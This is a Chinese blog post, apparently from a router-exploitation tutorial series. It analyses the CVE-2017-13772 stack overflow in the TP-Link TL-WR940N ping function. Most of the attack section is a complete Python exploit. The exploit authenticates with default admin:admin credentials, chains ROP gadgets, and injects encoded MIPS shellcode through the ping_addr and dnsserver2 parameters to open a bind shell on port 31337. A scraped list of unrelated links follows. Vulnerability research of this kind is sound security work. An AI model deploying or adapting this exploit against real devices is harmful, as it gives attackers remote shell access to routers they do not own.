前言

本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274

这个是最近爆出来的漏洞,漏洞编号:CVE-2017-13772

固件链接:http://static.tp-link.com/TL-WR940N(US)_V4_160617_1476690524248q.zip

之前使用 firmadyn 可以正常模拟运行,但是调试不了,就没有仔细看这个漏洞。今天突然想起 他会启动一个 ssh 服务,那我们是不是就可以通过ssh 连上去进行调试,正想试试,又不能正常模拟了。。。。。下面看具体漏洞。

正文

漏洞位与 管理员用来 ping 的功能,程序在获取ip 地址时没有验证长度,然后复制到栈上,造成栈溢出。搜索关键字符串 ping_addr 定位到函数 sub_453C50

获取 ip 地址后,把字符串指针放到 $s6寄存器,跟下去看看。

传入了ipAddrDispose函数,继续分析之:

先调用了 memset  初始化缓冲区,然后调用 strcpyip 地址复制到栈上,溢出。

利用的话和前文是一样的,经典的栈溢出,经典的 rop。

一步一步pwn路由器之rop技术实战

一步一步pwn路由器之路由器环境修复&&rop技术分析

附上参考链接里的 exp

#!/usr/bin/python

# -*- coding: UTF-8 -*-

import urllib2

import base64

import hashlib

from optparse import *

import sys

import urllib

banner = (

"___________________________________________________________________________\n"

"WR940N Authenticated Remote Code Exploit\n"

"This exploit will open a bind shell on the remote target\n"

"The port is 31337, you can change that in the code if you wish\n"

"This exploit requires authentication, if you know the creds, then\n"

"use the -u -p options, otherwise default is admin:admin\n"

"___________________________________________________________________________"

)

def login(ip, user, pwd):

	print "[+] Attempting to login to http://%s %s:%s"%(ip,user,pwd)

	#### Generate the auth cookie of the form b64enc('admin:' + md5('admin'))

	hash = hashlib.md5()

	hash.update(pwd)

	auth_string = "%s:%s" %(user, hash.hexdigest())

	encoded_string = base64.b64encode(auth_string)

	print "[+] Encoded authorisation: %s" %encoded_string#### Send the request

	url = "http://" + ip + "/userRpm/LoginRpm.htm?Save=Save"

	print "[+] sending login to " + url

	req = urllib2.Request(url)

	req.add_header('Cookie', 'Authorization=Basic %s' %encoded_string)

	resp = urllib2.urlopen(req)

	#### The server generates a random path for further requests, grab that here

	data = resp.read()

	next_url = "http://%s/%s/userRpm/" %(ip, data.split("/")[3])

	print "[+] Got random path for next stage, url is now %s" %next_url

	return (next_url, encoded_string)

#custom bind shell shellcode with very simple xor encoder

#followed by a sleep syscall to flush cash before running

#bad chars = 0x20, 0x00

shellcode = (

#encoder

"\x22\x51\x44\x44\x3c\x11\x99\x99\x36\x31\x99\x99"

"\x27\xb2\x05\x4b" #0x27b2059f for first_exploit

"\x22\x52\xfc\xa0\x8e\x4a\xfe\xf9"

"\x02\x2a\x18\x26\xae\x43\xfe\xf9\x8e\x4a\xff\x41"

"\x02\x2a\x18\x26\xae\x43\xff\x41\x8e\x4a\xff\x5d"

"\x02\x2a\x18\x26\xae\x43\xff\x5d\x8e\x4a\xff\x71"

"\x02\x2a\x18\x26\xae\x43\xff\x71\x8e\x4a\xff\x8d"

"\x02\x2a\x18\x26\xae\x43\xff\x8d\x8e\x4a\xff\x99"

"\x02\x2a\x18\x26\xae\x43\xff\x99\x8e\x4a\xff\xa5"

"\x02\x2a\x18\x26\xae\x43\xff\xa5\x8e\x4a\xff\xad"

"\x02\x2a\x18\x26\xae\x43\xff\xad\x8e\x4a\xff\xb9"

"\x02\x2a\x18\x26\xae\x43\xff\xb9\x8e\x4a\xff\xc1"

"\x02\x2a\x18\x26\xae\x43\xff\xc1"

#sleep

"\x24\x12\xff\xff\x24\x02\x10\x46\x24\x0f\x03\x08"

"\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"

"\x27\xa4\xfb\xfa\x01\x01\x01\x0c\x21\x8c\x11\x5c"

################ encoded shellcode ###############

"\x27\xbd\xff\xe0\x24\x0e\xff\xfd\x98\x59\xb9\xbe\x01\xc0\x28\x27\x28\x06"

"\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\x23\x39\x44\x44\x30\x50\xff\xff"

"\x24\x0e\xff\xef\x01\xc0\x70\x27\x24\x0d"

"\x7a\x69"            #<————————- PORT 0x7a69 (31337)

"\x24\x0f\xfd\xff\x01\xe0\x78\x27\x01\xcf\x78\x04\x01\xaf\x68\x25\xaf\xad"

"\xff\xe0\xaf\xa0\xff\xe4\xaf\xa0\xff\xe8\xaf\xa0\xff\xec\x9b\x89\xb9\xbc"

"\x24\x0e\xff\xef\x01\xc0\x30\x27\x23\xa5\xff\xe0\x24\x02\x10\x49\x01\x01"

"\x01\x0c\x24\x0f\x73\x50"

"\x9b\x89\xb9\xbc\x24\x05\x01\x01\x24\x02\x10\x4e\x01\x01\x01\x0c\x24\x0f"

"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\x28\x06\xff\xff\x24\x02\x10\x48"

"\x01\x01\x01\x0c\x24\x0f\x73\x50\x30\x50\xff\xff\x9b\x89\xb9\xbc\x24\x0f"

"\xff\xfd\x01\xe0\x28\x27\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f\x73\x50"

"\x9b\x89\xb9\xbc\x28\x05\x01\x01\xbd\x9b\x96\x46\x01\x01\x01\x0c\x24\x0f"

"\x73\x50\x9b\x89\xb9\xbc\x28\x05\xff\xff\xbd\x9b\x96\x46\x01\x01\x01\x0c"

"\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f\x35\xce"

"\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec\xaf\xa4\xff\xf8"

"\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab\x01\x01\x01\x0c\x24\x02"

"\x10\x46\x24\x0f\x03\x68\x21\xef\xfc\xfc\xaf\xaf\xfb\xfe\xaf\xaf\xfb\xfa"

"\x27\xa4\xfb\xfe\x01\x01\x01\x0c\x21\x8c\x11\x5c"

)

###### useful gadgets #######

nop = "\x22\x51\x44\x44"

gadg_1 = "\x2A\xB3\x7C\x60"  # set $a0 = 1, and jmp $s1

gadg_2 = "\x2A\xB1\x78\x40"

sleep_addr = "\x2a\xb3\x50\x90"

stack_gadg = "\x2A\xAF\x84\xC0"

call_code = "\x2A\xB2\xDC\xF0"

def first_exploit(url, auth):

	#          trash $s1        $ra

	rop = "A"*164 + gadg_2  + gadg_1 + "B"*0x20 + sleep_addr + "C"*4

	rop += "C"*0x1c + call_code + "D"*4 + stack_gadg + nop*0x20 + shellcode

	params = {'ping_addr': rop, 'doType': 'ping', 'isNew': 'new', 'sendNum': '20', 'pSize': '64', 'overTime': '800', 'trHops': '20'}

	new_url = url + "PingIframeRpm.htm?" + urllib.urlencode(params)

	print "[+] sending exploit…"

	print "[+] Wait a couple of seconds before connecting"

	print "[+] When you are finished do http -r to reset the http service"

	req = urllib2.Request(new_url)

	req.add_header('Cookie', 'Authorization=Basic %s' %auth)

	req.add_header('Referer', url + "DiagnosticRpm.htm")

	resp = urllib2.urlopen(req)

def second_exploit(url, auth):

	url = url + "WanStaticIpV6CfgRpm.htm?"

	#                 trash      s0      s1      s2       s3     s4      ret     shellcode

	payload = "A"*111 + "B"*4 + gadg_2 + "D"*4 + "E"*4 + "F"*4 + gadg_1 + "a"*0x1c

	payload += "A"*4 + sleep_addr + "C"*0x20 + call_code + "E"*4

	payload += stack_gadg + "A"*4 +  nop*10 + shellcode + "B"*7

	print len(payload)

	params = {'ipv6Enable': 'on', 'wantype': '2', 'ipType': '2', 'mtu': '1480', 'dnsType': '1',

	'dnsserver2': payload, 'ipAssignType': '0', 'ipStart': '1000',

	'ipEnd': '2000', 'time': '86400', 'ipPrefixType': '0', 'staticPrefix': 'AAAA',

	'staticPrefixLength': '64', 'Save': 'Save', 'RenewIp': '1'}

	new_url = url + urllib.urlencode(params)

	print "[+] sending exploit…"

	print "[+] Wait a couple of seconds before connecting"

	print "[+] When you are finished do http -r to reset the http service"

	req = urllib2.Request(new_url)

	req.add_header('Cookie', 'Authorization=Basic %s' %auth)

	req.add_header('Referer', url + "WanStaticIpV6CfgRpm.htm")

	resp = urllib2.urlopen(req)

if __name__ == '__main__':

	print banner

	username = "admin"

	password = "admin"

	(next_url, encoded_string) = login("192.168.0.1", username, password)

	###### Both exploits result in the same bind shell ######

	#first_exploit(data[0], data[1])

	first_exploit(next_url, encoded_string)

参考链接:

https://www.fidusinfosec.com/tp-link-remote-code-execution-cve-2017-13772/

一步一步pwn路由器之wr940栈溢出漏洞分析与利用的更多相关文章

  1. 一步一步pwn路由器之rop技术实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 这次程序也是 DVRF 里面的,他的路径是 pwnable/She ...

  2. 一步一步pwn路由器之环境搭建

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 正式进入路由器的世界了.感觉路由器这块就是固件提取,运行环境修复比 ...

  3. 一步一步pwn路由器之uClibc中malloc&&free分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 栈溢出告一段落.本文介绍下 uClibc 中的 malloc 和 ...

  4. 一步一步pwn路由器之radare2使用全解

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 radare2 最近越来越流行,已经进入 github 前 25了 ...

  5. 一步一步pwn路由器之radare2使用实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 前文讲了一些 radare2 的特性相关的操作方法.本文以一个 c ...

  6. 一步一步pwn路由器之路由器环境修复&&rop技术分析

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 拿到路由器的固件后,第一时间肯定是去运行目标程序,一般是web服务 ...

  7. 一步一步pwn路由器之栈溢出实战

    前言 本文由 本人 首发于 先知安全技术社区: https://xianzhi.aliyun.com/forum/user/5274 本文以 DVRF 中的第一个漏洞程序 stack_bof_01 为 ...

  8. 简单实例一步一步帮你搞清楚MVC3中的路由以及区域

    我们都知道MVC 3 程序的所有请求都是先经过路由解析然后分配到特定的Controller 以及 Action 中的,为什么这些知识讲完了Controller Action Model 后再讲呢?这个 ...

  9. 【计算机网络】一步一步学习IP路由流程

    TCP/IP协议簇是目前互联网应用最广的协议栈,谈到TCP/IP协议栈就不能不讲一讲IP路由的问题,因为在我们使用的网络通信中几乎每时每刻都在发生着IP路由的事件…….当你在网络世界中还是一位新手的时 ...

随机推荐

  1. Windows删除某服务

    win+R然后cmd进入命令窗口 sc delete 服务名

  2. solr8.0创建core,报Can't find resource 'solrconfig.xml

    出现这个问题,主要是因为没有找到对应的配置文件, 只需要将solr_home\configsets\_default\conf下的配置文件,拷贝到自己新建的core文件夹下即可解决问题!

  3. 图解JS

    弱语言 数据类型 隐式转换 弱等于 严格等于 包装对象 字符串转为包装对象 类型检测 表达式 运算符 块 try...catch 对象结构 创建对象,原型链 属性读写 getter,setter 序列 ...

  4. Java的设计模式之开篇(1)

    什么是设计模式呢?这个问题曾经一直困扰着我,以前我一直以为这是门新的技术,但是随着工作年限和工作经验的增加,其实设计模式就是已经在众多软件系统得到验证的成功的并且可复用的技术方案或者解决问题的方案.J ...

  5. # VsCode 配置C++调试运行

    VsCode 配置C++调试运行 打开命令面板快捷键为F1,软件上写的Ctrl+Shift+P似乎没用 先安装插件使得可以运行 先自行在vsc扩展中搜索C++安装C/C++插件 再参考知乎专栏中安装c ...

  6. python学习-28 map函数

    1. num_1 = [10,2,3,4] def map_test(array): ret = [] for i in num_1: ret.append(i**2) # 列表里每个元素都平方 re ...

  7. 第八讲,TLS表(线程局部存储)

    一丶复习线程相关知识 首先讲解TLS的时候,需要复习线程相关知识,  (thread local storage ) 1.了解经典同步问题 首先我们先写一段C++代码,开辟两个线程去跑,看看会不会出现 ...

  8. php 环境搭建问题

    项目过程中需要用到 PHP环境 https://www.cnblogs.com/cyrfr/p/6483529.html APACHE无法启动:THE REQUEST OPERATION HAS FA ...

  9. XXX银行人事管理系统-数据库设计

    1. 用户.权限.角色关系用户基本信息 userinfo [人员表]权限表actions[权限表]员工类型表usertype [管理组表]权限映射表actionmapping [权限映射表]权限分栏表 ...

  10. Seaborn(二)之数据集分布可视化

    Seaborn(二)之数据集分布可视化 当处理一个数据集的时候,我们经常会想要先看看特征变量是如何分布的.这会让我们对数据特征有个很好的初始认识,同时也会影响后续数据分析以及特征工程的方法.本篇将会介 ...